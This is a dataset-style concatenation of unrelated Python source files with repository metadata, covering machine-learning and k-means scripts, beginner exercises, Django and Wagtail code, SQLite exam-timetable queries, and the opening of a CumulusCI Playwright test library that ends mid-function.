from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix
from sklearn.cross_validation import cross_val_score
wine = datasets.load_wine()
x_data = wine.data
y_data = wine.target
x_train, x_test, y_train, y_test = train_test_split(x_data, y_data, test_size = 0.3)
sc = StandardScaler()
sc.fit(x_train)
x_train = sc.transform(x_train)
x_test = sc.transform(x_test)
clf = tree.DecisionTreeClassifier()
iris_clf = clf.fit(x_train, y_train)
prediction = iris_clf.predict(x_test)
accuracy = metrics.accuracy_score(y_test, prediction)
cnf=confusion_matrix(y_test,prediction)
print('accuracy: ',accuracy)
print('prediction:')
print(prediction)
print('y_test_label:')
print(y_test)
print('confusion matrix:')
print(cnf)
scores = cross_val_score(clf, x_data, y_data, cv=10, scoring='accuracy')
print('10-Fold cross validation mean:',scores.mean())
| UTF-8 | Python | false | false | 1,009 | py | 2 | DecisionTree.py | 2 | 0.732408 | 0.726462 | 0 | 31 | 30.548387 | 84 |
luisnarvaez19/Proyectos_Python | 3,367,254,367,249 | 275ec4089b0e1ec38910c3841f500897a9071bf7 | 560fc121079581f0568d6aa59a14053015da08be | /edu/cursoLN/practica1/creciente.py | b6f5c782db7b7059c9f5320182619e430471f4b3 | [] | no_license | https://github.com/luisnarvaez19/Proyectos_Python | 1f5c31d3592ec5fb2594d1f4b0163338d5751951 | 45dc51ce9d93f0b7e96eff9ca7100bd4b69e172e | refs/heads/master | 2021-06-21T13:02:22.901541 | 2021-03-17T23:57:58 | 2021-03-17T23:57:58 | 199,532,892 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
9. Escribir un programa en Python que detecte si se han introducido en orden creciente
tres números introducidos por el usuario.
'''
x = 5
y = 9
z = 2
if x > y and y > z:
print('Si se han introducido en orden creciente')
else:
print('No se han introducido en orden creciente')
'''
9. Escribir un programa en Python que ordene
dos números introducidos por el usuario.
'''
x = 85
y = 59
temp = 0
if x > y:
temp = y
y = x # ahora y = 85
x = temp
print(f'Ordenados en forma creciente, x es: {x}, y es: {y} ')
'''
9. Escribir un programa en Python que ordene
tres números introducidos por el usuario.
'''
x = 5
y = 9
z = 2
print(f'Ordenados en forma creciente, x es: {x}, y es: {y} y z es: {z}')
x = 85
y = 59
temp = 0
# y = luis x = pablo temp = silla intermedia temporal
if x > y : # perfecto
temp = x
x = y
y = temp
print(f'Ordenados en forma creciente, x es: {x}, y es: {y}' )
x = 85
y = 59
temp = 0
if x > y :
temp = y
y = x
x = temp
print(f'Ordenados en forma creciente, x es: {x}, y es: {y}' )
x = 85
y = 59
anterior = 0
if x > y :
anterior = x
x = y
y = anterior
print(f'Ordenados en forma creciente, x es: {x}, y es: {y}' )
x = 85
y = 59
temp = 0
if x > y:
temp = x
x = y
y = temp
print(f'Ordenados en forma creciente, x es: {x}, y es: {y}' )
| UTF-8 | Python | false | false | 1,406 | py | 2,230 | creciente.py | 159 | 0.563079 | 0.53742 | 0 | 101 | 12.831683 | 90 |
eea/eea.docker.flis | 1,348,619,775,629 | 45c429131fdc2cd6b40891029fbb7d4578f515f7 | c8687527a70d7e11610560adb8e86dd69585b4aa | /code/pages/wagtail_hooks.py | cf7154af788d95d33f5ee27b1384fbfeeafef5fa | [
"BSD-3-Clause"
] | permissive | https://github.com/eea/eea.docker.flis | 0d69964687eca81a9d43aff3bdd3a8598a9d22f7 | 9bc78d9bf3436e9539f15a6a0ba9c2fd7a030907 | refs/heads/master | 2023-08-01T05:36:40.303785 | 2017-07-06T17:08:36 | 2017-07-06T17:08:36 | 94,788,064 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.conf import settings
from django.utils.html import format_html_join, format_html
from wagtail.wagtailcore import hooks
from .admin import *
@hooks.register('insert_editor_js')
def editor_js():
js_files = [
'pages/js/tweak_richtext_buttons.js',
]
js_includes = format_html_join('\n', '<script src="{0}{1}"></script>',
((settings.STATIC_URL, filename) for filename in js_files)
)
return js_includes
@hooks.register('construct_main_menu')
def hide_snippets_menu_item(request, menu_items):
menu_items[:] = [item for item in menu_items if item.name != 'snippets']
@hooks.register('insert_global_admin_css')
def global_admin_css():
from django.contrib.staticfiles.templatetags.staticfiles import static
return format_html('<link rel="stylesheet" href="{}">', static('pages/css/wagtailadmin-style.css'))
| UTF-8 | Python | false | false | 921 | py | 142 | wagtail_hooks.py | 68 | 0.655809 | 0.653637 | 0 | 26 | 34.423077 | 103 |
malk321/master-python | 18,313,740,567,271 | 85c579ed54a07e7d1734062ded504938926689ab | 53b6447da398945a7f9e918f6de3cf6b711a8b9a | /INF413/tp2/tp2.py | 54c3b0041d0eaa976900eb77a3bbd068892f6de1 | [] | no_license | https://github.com/malk321/master-python | 0642636e850f2f1f58fb98f3d976d4313fe5a43c | 42f13603eaa48213de3e47951d394199ad10ebcf | refs/heads/master | 2020-04-16T23:02:27.668865 | 2017-02-26T21:57:17 | 2017-02-26T21:57:17 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding : utf-8 -*-
import math, random, sys
# Authors: Benoit PORTEBOEUF, Morgan ROBIN
# Date: 10.09.2015
# Course: MAJ INF-413
########################################
## ##
## K-MEANS ALGORITHM IMPLEMENTATION ##
## ##
########################################
"""
This software implements a k-means algorithm. Data must be written in a file named 'data.txt' as follow: coord1, coord2, ..., coordn, string\ncoord1', ...
It will be possible to choose between different types of norm calculation - Euclidean and Manhattan are currently available.
There is two classes: point and group. A point is defined by its name (id), its coordinates and a string (for instance, its specie). A group is defined by a name (id), a center (point), and points.
"""
###################################
# CLASS DEFINITIONS
###################################
class point : # Name is the id (int) of the point, coordinate is a list of its coordinates and specie is a string that qualifies it
def __init__(self,name,coordinates,specie) :
self.name = name
self.coordinates = coordinates
self.specie = specie
return
def __str__(self) :
return str(self.name) + str(self.coordinates) + str(self.specie)
def __eq__(self, name) :
if self.name == name :
return True
else :
return False
class group : # A group is a set of points. Name is the id (int) of the group, center is the closest point to its isobarycenter and points is a list f its points.
    """A cluster: an id, a center point, and the member points.

    BUG FIX: the original class also defined a method named ``center`` that
    shared its name with the ``self.center`` attribute assigned in
    ``__init__``.  The instance attribute shadowed the method, so the method
    was unreachable dead code; it has been removed.  All callers in this file
    assign ``group.center`` directly.
    """
    def __init__(self,name) :
        self.name = name
        self.center = None      # point chosen as this group's center
        self.points = list()    # member points of the group
        return
    def add(self,point) :
        """Append a point to the group."""
        self.points.append(point)
        return
    def remove(self,point) :
        """Remove a point from the group (raises ValueError if absent)."""
        self.points.remove(point)
        return
    def __str__(self) :
        s = str()
        for point in self.points :
            s += " "+str(point)
        return "group " + str(self.name) + " - " + "center: " + str(self.center) +" - points: " + s
######################################
# DISTANCE CALCULATION
######################################
def Distance(center, point, norm):
    """Distance between two points under the norm named by *norm*.

    ``norm`` may be "Euclidean" or "Manhattan"; any other value falls
    back to the sup (infinity) norm.
    """
    if norm == "Euclidean":
        return Euclidean(center, point)
    if norm == "Manhattan":
        return Manhattan(center, point)
    return Sup(center, point)
def Euclidean(center, point):
    """Euclidean (L2) distance between *center* and *point*."""
    squares = sum(
        (float(center.coordinates[i]) - float(point.coordinates[i])) ** 2
        for i in range(len(center.coordinates))
    )
    return math.sqrt(float(squares))
def Manhattan(center, point):
    """Manhattan (L1) distance: sum of absolute per-coordinate gaps."""
    return sum(
        abs(float(center.coordinates[i]) - float(point.coordinates[i]))
        for i in range(len(center.coordinates))
    )
def Sup(center, point):
    """Sup (L-infinity) distance: the largest per-coordinate gap."""
    largest = 0
    for i in range(len(center.coordinates)):
        gap = abs(float(center.coordinates[i]) - float(point.coordinates[i]))
        if gap >= largest:
            largest = gap
    return largest
#####################################
# INITIALIZATION
#####################################
def choose(k, data):
    """Pick *k* distinct random indices into *data* to seed the centers."""
    centers = list()
    while len(centers) < k:
        candidate = random.randrange(len(data))
        # Re-draw on duplicates so all chosen centers are distinct.
        if candidate not in centers:
            centers.append(candidate)
    return centers
def make_group(centers, data):
    """Build one group per chosen center, holding only its center point."""
    groups = dict()
    for idx, center_key in enumerate(centers):
        grp = group(str(idx))
        grp.center = data[center_key]
        groups[idx] = grp
    return groups
######################################
# LOOP INSTRUCTIONS
######################################
def optimizing(groups,data,norm) : # Calculates the distance of every point to every centers and optimizes groups
    """Assign every point to its nearest group center (one k-means step).

    groups: dict of group objects keyed by int; data: dict of point objects
    keyed by int; norm: name of the distance norm.  Returns the (mutated)
    groups dict.  Prints a line for every membership change.
    """
    for point in data : # NOTE: 'point' here is a dict key (an int), not a point object
        dist = list()
        for group in groups :
            dist.append(Distance(groups[group].center,data[point],norm))
        i = 0
        mini = dist[0]
        for elt in dist : # Finds the closest center and group
            # '<=' means later groups win ties with earlier ones.
            if elt <= mini :
                mini = elt
                gr = i
            i+=1
        #print(dist,mini,gr,point)
        # Membership test compares the int key against point objects; this
        # works only because point.__eq__ compares self.name to the operand.
        if point not in groups[gr].points : # Changes group if needed
            groups[gr].add(data[point])
            print("point "+str(point)+" added to group "+str(gr))
        for group in groups : # Removes the point from its previous group if needed
            # A group's own center point is deliberately never removed.
            if groups[group].name != groups[gr].name and data[point] in groups[group].points and groups[group].center != data[point] :
                groups[group].remove(data[point])
                print("point "+str(point)+" removed from group "+str(group))
    return groups
def new_centers(groups,centers,norm) : # Calculates the centers of the different groups
    """Recompute each group's center as the member nearest its isobarycenter.

    Returns ``(groups, centers2)`` where ``centers2`` is the list of the new
    center points' names, one per group.

    BUG FIX: the original rebuilt ``dist`` inside the per-point loop, so the
    list always held a single element and the arg-min search always selected
    index 0 (the first member).  The distances are now collected for *all*
    members before choosing the minimum.
    """
    centers2 = list()
    for group in groups : # Calculates the isobarycenter of every group
        gr = groups[group]
        # Accumulate coordinate sums; bary starts as [0] so the first
        # coordinate adds in place and later ones are appended.
        bary = [0]
        for Point in gr.points :
            for i, coordinate in enumerate(Point.coordinates) :
                if len(bary)-1 < i :
                    bary.append(float(coordinate))
                else :
                    bary[i] += float(coordinate)
        coordinates = list()
        for coordinate in bary :
            if len(gr.points)!=0 :
                coordinates.append(float(coordinate)/float(len(gr.points)))
        barycenter = point("bary"+str(group),coordinates," ")
        # Finds the closest member to the calculated isobarycenter.
        dist = [Distance(barycenter, Point, norm) for Point in gr.points]
        b = 0
        for i in range(len(dist)) :
            if dist[i] < dist[b] :
                b = i
        centers2.append(gr.points[b].name) # Updates the center
        gr.center = gr.points[b]
    return groups,centers2
######################################
# TESTS
######################################
def verify_specie(groups):
    """Return True iff every point in each group shares that group's specie."""
    for key in groups:
        members = groups[key].points
        reference = members[0].specie
        if any(member.specie != reference for member in members):
            return False
    return True
def verify_norms():
    """Sanity-check the three norms: separation, known values, positivity
    and the triangular inequality.  Returns True iff all checks pass."""
    a = point('a', [0, 1, 2], ' ')
    b = point('b', [1, 0, 2], ' ')
    c = point('c', [2, 1, 0], ' ')
    O = point('0', [0, 0, 0], ' ')
    norms = ('Euclidean', 'Sup', 'Manhattan')
    # Separation: d(x, x) == 0 under every norm.
    if any(Distance(a, a, n) != 0 for n in norms):
        return False
    # Known results for a fixed pair (int() absorbs float rounding).
    if not (int(Distance(a, b, 'Euclidean') ** 2) == 2
            and int(Distance(a, b, 'Sup')) == 1
            and int(Distance(a, b, 'Manhattan')) == 2):
        return False
    # Positivity for distinct points.
    if any(Distance(a, O, n) <= 0 for n in norms):
        return False
    # Triangular inequality.
    for n in norms:
        if Distance(a, c, n) > Distance(a, b, n) + Distance(b, c, n):
            return False
    return True
######################################
# MAIN
######################################
def input_(string):
    """Prompt the user; works under both Python 2 and Python 3."""
    if sys.version_info[0] >= 3:
        return input(string)
    return raw_input(string)  # noqa: F821 - Python 2 builtin
def main(k,norm) :
    """Run k-means over the points loaded from 'data.txt' and print results.

    ``k`` and ``norm`` may each be the string 'NULL', in which case the user
    is prompted interactively for the value.  Returns the final list of
    center names.
    """
    print("Starting programm...")
    print("Loading data...")
    dat = open('data.txt','r')
    data2 = dat.read().split("\n")
    dat.close()
    data = dict() # Every point is loaded into a dictionary
    i = 0
    for elt in data2 :
        if len(elt) != 0 :
            elt = elt.split(",")
            l = len(elt)-1
            data[len(data)] = point(i,elt[:l],elt[l])
            i+=1
    if k == "NULL" :
        maxi = len(data)
        k = 0
        while k == 0 :
            k = int(input_("Enter a number of group\n"))
            # BUG FIX: the original test was ``k<1 and k>maxi`` which can
            # never be true, so any out-of-range value was accepted.
            if k < 1 or k > maxi:
                k = 0
    print("Choosing "+str(k)+" centers...") # k centers are randomly chosen among the points
    centers = choose(k,data)
    print("Creating groups...") # And k empty groups are created according to the k chosen centers
    groups = make_group(centers, data)
    while norm == 'NULL' :
        norm = input_("Choose your norm for distance calculation: Euclidean, Manhattan or Sup\n")
        if norm != "Euclidean" and norm != "Manhattan" and norm != "Sup":
            norm = 'NULL'
    print(norm)
    print("Optimizing groups...")
    stable = False
    while not stable : # As long as the centers are not stable, we optimize the groups (centers and associated points)
        centers_old = list(centers)
        groups = optimizing(groups,data,norm)
        groups,centers = new_centers(groups,centers,norm)
        # BUG FIX: ``stable`` must be reset once *before* the scan; the
        # original reset it inside the loop, so only the last center was
        # effectively compared.
        stable = True
        for i in range(k) :
            if centers[i] != centers_old[i] :
                stable = False
    print("Groups optimized.")
    print("Verifying norms...")
    if verify_norms() :
        print("Norms successfully verified")
    else :
        print("An error has occured: norms do not behave correctly")
    print("Verifying results...")
    if verify_specie(groups) :
        print("Results successfully verified: all points in a group are of the same kind.")
    else :
        print("An error has been found: all points in a group are not of the same kind.")
    for group in groups :
        print("\n"+str(groups[group])+"\n")
    print("Done")
    return centers
# Entry point: 'NULL' makes main() prompt interactively for both the number
# of groups and the distance norm.
main('NULL','NULL')
| UTF-8 | Python | false | false | 9,111 | py | 72 | tp2.py | 52 | 0.619471 | 0.61091 | 0 | 321 | 27.380062 | 271 |
Arthur264/rest_blog | 15,307,263,455,143 | d0f5a53bee85b67105e7e4777835b62c1c7e2613 | 93a07a2b9910ec54c99404b34f2ca16086c50f85 | /posts/migrations/0002_auto_20180430_1601.py | f6f69d9af74806a5b4ebc19e049a5f71e66d55b4 | [] | no_license | https://github.com/Arthur264/rest_blog | 426e810ba4668f367f5dcde9ac328b98edd4b66d | cb1782208cf6c071fc54447aa5f849d20951b1ba | refs/heads/master | 2023-01-06T05:24:49.102544 | 2018-05-02T12:38:01 | 2018-05-02T12:38:01 | 126,502,369 | 0 | 1 | null | false | 2022-12-26T20:15:15 | 2018-03-23T15:12:55 | 2018-05-02T12:38:18 | 2022-12-26T20:15:13 | 1,245 | 0 | 1 | 11 | Python | false | false | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-04-30 16:01
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated schema migration: renames the 'create'/'update'
    # timestamp fields to 'create_at'/'update_at' on the category, post
    # and postvisited models.
    dependencies = [
        ('posts', '0001_initial'),
    ]
    operations = [
        migrations.RenameField(
            model_name='category',
            old_name='create',
            new_name='create_at',
        ),
        migrations.RenameField(
            model_name='category',
            old_name='update',
            new_name='update_at',
        ),
        migrations.RenameField(
            model_name='post',
            old_name='create',
            new_name='create_at',
        ),
        migrations.RenameField(
            model_name='post',
            old_name='update',
            new_name='update_at',
        ),
        migrations.RenameField(
            model_name='postvisited',
            old_name='create',
            new_name='create_at',
        ),
        migrations.RenameField(
            model_name='postvisited',
            old_name='update',
            new_name='update_at',
        ),
    ]
| UTF-8 | Python | false | false | 1,134 | py | 45 | 0002_auto_20180430_1601.py | 42 | 0.502646 | 0.483245 | 0 | 45 | 24.2 | 49 |
nonsoo/ExamTimetable | 13,709,535,644,111 | dce8121f9cf622099537b878c74871981cfa5294 | 941918352a200b12cbfa6fe6102d9070701a1c27 | /Databases(Assignment 3)/queries.py | d13d9e897d4abf9c8cb6a3ef8945acf215d301ac | [] | no_license | https://github.com/nonsoo/ExamTimetable | 1eec6402467bffe1e5141e745f0dd3be47833770 | 6ed26198afbdb38c2b445fbfa29042a16c1a667c | refs/heads/main | 2023-02-19T01:57:32.926457 | 2021-01-23T14:54:40 | 2021-01-23T14:54:40 | 332,234,972 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sqlite3
from make_tables import check_courses
def run_query(db, query, args=None):
    """(str, str, tuple) -> list of tuple

    Run *query* against the SQLite database *db*, optionally binding *args*
    as query parameters, and return all result rows.

    BUG FIX: the connection is now closed in a ``finally`` block, so it is
    no longer leaked when ``execute`` raises (e.g. on a malformed query).
    """
    conn = sqlite3.connect(db)
    try:
        cur = conn.cursor()
        # execute the query with the given args passed
        # if args is None, we have only a query
        if args is None:
            cur.execute(query)
        else:
            cur.execute(query, args)
        results = cur.fetchall()
        cur.close()
    finally:
        conn.close()
    return results
def get_course_instructors(db, course):
    '''Return every (course, section, instructor) row for *course*.

    >>> get_course_instructors('exams.db', 'BIOC12H3F')
    [('BIOC12H3F', 'LEC01', 'R. Zhao')]
    '''
    sql = '''SELECT Course, Section, Name FROM Courses
    WHERE Course= ?'''
    return run_query(db, sql, (course,))
def get_course_time(db, course):
    '''Return (course, ID, exam date, start time) for every section of
    *course*.  Multiple rows appear only when the course IDs differ.

    >>> get_course_time('exams.db', 'BIOC12H3F')
    [('BIOC12H3F', '32', '17-12-18', '14:00')]
    '''
    sql = '''SELECT DISTINCT Courses.Course, Courses.ID, Time.Date,
    Time.Start FROM Courses JOIN Time ON Courses.ID = Time.ID WHERE
    Course = ? '''
    return run_query(db, sql, (course,))
def get_course_time_section(db, course, section):
    '''Return (course, section, exam date, start time) for the given
    course and section.

    >>> get_course_time_section('exams.db', 'BIOC12H3F', 'LEC01')
    [('BIOC12H3F', 'LEC01', '17-12-18', '14:00')]
    '''
    sql = '''SELECT DISTINCT Courses.Course, Courses.Section, Time.Date,
    Time.Start FROM Courses JOIN Time ON Courses.ID = Time.ID WHERE
    Course = ? AND Section= ?'''
    return run_query(db, sql, (course, section))
def courses_multi_instructors(db):
    '''Return (course, instructor) rows for every course taught by more
    than one instructor.  Instructors share a course when their rows share
    the same ID.

    >>> courses_multi_instructors('exams.db')[:2]
    [('BIOA01H3F', 'M. Fitzpatrick'), ('BIOA01H3F', 'A. Ashok')]
    '''
    sql = '''SELECT Course, Name FROM Courses WHERE ID IN
    (SELECT ID FROM Courses GROUP BY ID having COUNT(*) > 1 )'''
    return run_query(db, sql)
def courses_how_many_instructors(db):
    '''Return (course, instructor count) rows for courses with more than
    one instructor (i.e. more than one row sharing the same ID).

    >>> courses_how_many_instructors('exams.db')[:2]
    [('HLTC16H3F', 2), ('MATA29H3F', 2)]
    '''
    sql = '''SELECT DISTINCT Course, Count(ID) AS number_of_instructors
    FROM Courses GROUP BY ID HAVING COUNT (ID) > 1'''
    return run_query(db, sql)
def find_dept_courses(db, dept):
    '''Return the courses whose code starts with the given department
    prefix, using a LIKE pattern.

    >>> find_dept_courses('exams.db', 'BIOA')
    [('BIOA01H3F',), ('BIOA11H3F',)]
    >>> find_dept_courses('exams.db', 'CSCA')
    [('CSCA08H3F',), ('CSCA20H3F',), ('CSCA67H3F',)]
    '''
    # SECURITY FIX: the pattern is now bound as a query parameter instead of
    # being concatenated into the SQL text, which allowed SQL injection (and
    # broke on department strings containing quotes).
    query = '''SELECT DISTINCT Course FROM Courses WHERE Course LIKE ?'''
    args = (str(dept) + '%',)
    return run_query(db, query, args)
def get_locations(db, course):
    '''Return (course, section, exam room) rows for the given course.

    >>> get_locations('exams.db', 'BIOC12H3F')
    [('BIOC12H3F', 'LEC01', 'SW319'), ('BIOC12H3F', 'LEC01', 'SY110')]
    '''
    sql = '''SELECT DISTINCT Courses.Course, Courses.Section, Location.Room
    FROM Courses JOIN Location ON Courses.ID = Location.ID WHERE Course = ?'''
    return run_query(db, sql, (course,))
def check_conflicts(db, course):
    '''Return the course numbers of every *other* course whose exam shares
    the given course's date and start time.

    >>> check_conflicts('exams.db', 'BIOA01H3F')
    [('BIOB50H3F',), ('ENGB27H3F',), ('MGHB02H3F',), ('PHLB05H3F',)]
    '''
    # First look up this course's own exam slot, then search for every
    # other course scheduled in the same slot.
    own_time = get_course_time(db, course)
    exam_date = own_time[0][2]
    exam_start = own_time[0][3]
    query = '''SELECT DISTINCT Course FROM Courses JOIN Time ON
    Courses.ID = Time.ID WHERE Time.Date = ? AND Time.Start = ?
    AND Course != ?'''
    return run_query(db, query, (exam_date, exam_start, course))
if __name__ == '__main__':
    # Interactive driver: collects a list of the user's courses, then
    # prints the exam date/time for each one from the 'exams.db' database.
    # you may assume the database has been made and has the name
    # DO NOT CHANGE THIS LINE
    db = 'exams.db'
    # add the rest of your code here
    my_course_lst = []
    valid_course = []
    exam_schedule = {}
    valid = check_courses(db)
    # Stores all courses for the semester in the lst 'valid_course' to allow
    # for validation later
    for i in range(len(valid)):
        valid_course.append(valid[i][1])
    # Asks the user to enter as many courses as they desire, until the user
    # returns nothing. Then converts all entered courses to uppercase to
    # prevent the program from crashing. Program then checks if the entered
    # course is a valid course. If the course entered is not a valid course,
    # then display Not a valid course
    quit = False
    while quit is False:
        entered_course = input('Please enter your course or return to quit: ')
        # Checks if course entered is a valid course
        if entered_course.upper() in valid_course:
            my_course_lst.append(entered_course.upper())
        elif entered_course == '':
            quit = True
        else:
            print('Not a valid course code, please re-enter or return to \
quit. ')
    # Retrieve Exam Times
    # Goes through every course in course lst and checks if the course has
    # multiple sections. If the course does not have multiple sections, then
    # retrive the exam time for the course. If the course has multiple
    # sections then retreive the exam time for the particular section of the
    # course. Then store the information in a dictionary where the key is the
    # specific course and the value is a list of tuple containing the exam
    # course_code, time, date, section/ID
    for course in my_course_lst:
        check_section = get_course_instructors(db, course)
        # CHECKS IF THE SECTION FOR THE PARTICULAR COURSE IS ALL
        if check_section[0][1] == 'ALL':
            exam_time = get_course_time(db, course)
        else:
            section = input('There are multiple sections of %s. What is your \
section?: ' % (course))
            exam_time = get_course_time_section(db, course, section.upper())
        # exam_schedule dict is dictionary containing course name as key and
        # course info as the value
        exam_schedule[course] = exam_time
    # Goes through keys and values in exam_schedule and prints the course with
    # time and date in accordance to the presence or absence of the section.
    # A leading digit means the second field is a numeric course ID (from
    # get_course_time); a letter means it is a section code like 'LEC01'.
    for (courses, course_info) in exam_schedule.items():
        if course_info[0][1][0].isdigit():
            print('Course %s has exam on %s at %s'
                  % (courses, course_info[0][2], course_info[0][3]))
        else:
            print('Course %s section %s has exam on %s at %s'
                  % (courses, course_info[0][1], course_info[0][2],
                     course_info[0][3]))
| UTF-8 | Python | false | false | 11,007 | py | 3 | queries.py | 3 | 0.631053 | 0.591805 | 0 | 285 | 37.621053 | 78 |
iffanux/vstutils | 7,078,106,113,876 | b0b6b66f4a4931d65bd0c64cf4b4a600bbb43695 | 51a62a14ef31f7001f0eade4e30813eb0b0a7147 | /vstutils/__init__.py | fc023e801b2b1a5a97432914de90bd16538a8d3f | [
"Apache-2.0"
] | permissive | https://github.com/iffanux/vstutils | 62b3c122a884c6deef8e2f42a90c298706de8faa | 4ff1a21a8fe0641895af758680a116d2bd8056aa | refs/heads/master | 2020-05-16T18:22:08.978787 | 2019-04-24T08:15:30 | 2019-04-24T08:15:30 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # pylint: disable=django-not-available
# Package version string for vstutils.
__version__ = '1.9.5'
| UTF-8 | Python | false | false | 61 | py | 2 | __init__.py | 1 | 0.672131 | 0.622951 | 0 | 2 | 29.5 | 38 |
n0miya/ProblemSet | 2,448,131,360,651 | 06efdbdfa183104d07f0750287ab52ba280772a5 | c942f480783cad493b4804d666337265a308fddd | /Coding_Competency/LeetCode/617_Merge_Two_Binary_Trees.py | dee58eda4222e0018de50d85d7615c099378f920 | [] | no_license | https://github.com/n0miya/ProblemSet | bb1346cd9d2cf98b0cd16227385e30656b90d4f5 | dd82722398f082ee7a4fbf2d14fdaa456a9c32d5 | refs/heads/main | 2023-05-07T10:46:21.410285 | 2023-05-04T17:34:02 | 2023-05-04T17:34:02 | 370,749,594 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from typing import Optional
# Definition for a binary tree node.
class TreeNode:
    # Binary tree node: a value plus optional left/right children
    # (None means the child is absent).
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right
class Solution:
    def mergeTrees(self, root1: "Optional[TreeNode]", root2: "Optional[TreeNode]") -> "Optional[TreeNode]":
        """Merge two binary trees by summing values of overlapping nodes.

        Where only one tree has a node, that subtree is used as-is.  The
        merge reuses root1's nodes in place and returns the merged root.

        BUG FIX: the previous while-loop implementation never terminated
        (it re-tested ``root1.left`` without ever changing it) and assigned
        node objects into ``val``.  Replaced with the standard recursive
        merge.  Annotations are string forward references so the method is
        importable without the TreeNode definition in scope.
        """
        if root1 is None:
            return root2
        if root2 is None:
            return root1
        # Both nodes exist: sum the values, then merge each child pair.
        root1.val += root2.val
        root1.left = self.mergeTrees(root1.left, root2.left)
        root1.right = self.mergeTrees(root1.right, root2.right)
        return root1
# Demo: trees [1,3,2,5] and [2,1,3,null,4,null,7] from the LeetCode example.
tree1 = TreeNode(1, TreeNode(3, TreeNode(5, None, None), None), TreeNode(2, None, None))
tree2 = TreeNode(2, TreeNode(1, None, TreeNode(4, None, None)), TreeNode(3, None, TreeNode(7, None, None)))
# Prints the merged root object (default object repr, since TreeNode
# defines no __repr__/__str__).
print(Solution().mergeTrees(tree1, tree2))
| UTF-8 | Python | false | false | 818 | py | 999 | 617_Merge_Two_Binary_Trees.py | 573 | 0.632029 | 0.600244 | 0 | 25 | 31.72 | 107 |
zcwist/dx2x2 | 283,467,866,103 | 83e5d78323e5674dbd0be2603cce9df0f34fdb2c | 2f849e5abab4688bb39cd2f31607605506c33234 | /database/DBTester.py | f878cfbd1fb7985fe6c37c78c7733a5509a515f5 | [] | no_license | https://github.com/zcwist/dx2x2 | e3935b47308197650dd0964cc970274f936dc80a | 1b65ef30cfcba320336dbf34708dc3768fb100c3 | refs/heads/master | 2022-12-10T23:07:06.321355 | 2018-07-02T04:17:19 | 2018-07-02T04:17:19 | 94,134,604 | 0 | 1 | null | false | 2021-06-01T22:18:49 | 2017-06-12T19:51:08 | 2018-07-02T04:17:55 | 2021-06-01T22:18:49 | 6,510 | 0 | 1 | 5 | JavaScript | false | false | from DBAccess import *
from addData import *
if __name__ == "__main__":
for x in range(10):
print get_user_name("001")
print get_user_name("002") | UTF-8 | Python | false | false | 166 | py | 31 | DBTester.py | 13 | 0.578313 | 0.53012 | 0 | 7 | 22.857143 | 34 |
SFDO-Tooling/CumulusCI | 9,663,676,454,828 | ef34eb7a0af94bfe747f570cbc648bbf59481670 | 6564f42640e11689c2ddb6b92325afe6fddc6a6f | /cumulusci/robotframework/SalesforcePlaywright.py | 9eba2edf11d0a0f6159b009b5fffedb74faa98f1 | [
"LicenseRef-scancode-free-unknown"
] | permissive | https://github.com/SFDO-Tooling/CumulusCI | 32d4509fa8a36905cfc84fd6283403fd7f4b78c4 | 9ccf3c9566f78c6e9102ac214db30470cef660c1 | refs/heads/main | 2023-08-18T04:53:55.733027 | 2023-08-11T20:52:08 | 2023-08-11T20:52:08 | 15,592,459 | 226 | 134 | BSD-3-Clause | false | 2023-09-14T05:09:26 | 2014-01-02T20:01:31 | 2023-08-31T22:41:13 | 2023-09-13T23:57:42 | 100,017 | 336 | 228 | 175 | Python | false | false | import re
import time
from Browser import SupportedBrowsers
from Browser.utils.data_types import KeyAction, PageLoadStates
from robot.utils import timestr_to_secs
from cumulusci.robotframework.base_library import BaseLibrary
from cumulusci.robotframework.faker_mixin import FakerMixin
from cumulusci.robotframework.utils import (
WAIT_FOR_AURA_SCRIPT,
capture_screenshot_on_error,
)
class SalesforcePlaywright(FakerMixin, BaseLibrary):
    """Robot Framework keyword library for Salesforce UI testing via the
    robotframework-browser (Playwright) library."""

    ROBOT_LIBRARY_SCOPE = "Suite"

    def __init__(self):
        super().__init__()
        # Lazily resolved handle to the Browser library instance (see the
        # ``browser`` property below).
        self._browser = None

    @property
    def browser(self):
        # Resolve the Browser library on first use so this library can be
        # imported before Browser is.
        if self._browser is None:
            self._browser = self.builtin.get_library_instance("Browser")
        return self._browser

    def get_current_record_id(self):
        """Parses the current url to get the object id of the current record.

        This expects the url to contain an id that matches [a-zA-Z0-9]{15,18}
        """
        # The optional '%2F' prefix handles a URL-encoded leading slash.
        OID_REGEX = r"^(%2F)?([a-zA-Z0-9]{15,18})$"
        url = self.browser.evaluate_javascript(None, "window.location.href")
        for part in url.split("/"):
            oid_match = re.match(OID_REGEX, part)
            if oid_match is not None:
                return oid_match[2]
        raise AssertionError(f"Could not parse record id from url: {url}")

    def go_to_record_home(self, obj_id):
        """Navigates to the Home view of a Salesforce Object

        After navigating, this will wait until the slds-page-header_record-home
        div can be found on the page.
        """
        url = self.cumulusci.org.lightning_base_url
        url = f"{url}/lightning/r/{obj_id}/view"
        self.browser.go_to(url)
        self.wait_until_loading_is_complete("div.slds-page-header_record-home")

    def delete_records_and_close_browser(self):
        """This will close all open browser windows and then delete
        all records that were created with the Salesforce API during
        this testing session.
        """
        self.browser.close_browser("ALL")
        self.salesforce_api.delete_session_records()

    def open_test_browser(
        self, size=None, useralias=None, wait=True, record_video=None
    ):
        """Open a new Playwright browser, context, and page to the default org.

        The return value is a tuple of the browser id, context id, and page details
        returned by the Playwright keywords New Browser, New Context, and New Page.

        This provides the most common environment for testing. For more control,
        you can create your own browser environment with the Browser library
        keywords `Create Browser`, `Create Context`, and `Create Page`.

        To record a video of the session, set `record_video` to True. The video
        (*.webm) will be viewable in the log.html file at the point where this
        keyword is logged.

        This keyword automatically calls the browser keyword `Wait until network is idle`.
        """
        wait = self.builtin.convert_to_boolean(wait)
        default_size = self.builtin.get_variable_value(
            "${DEFAULT BROWSER SIZE}", "1280x1024"
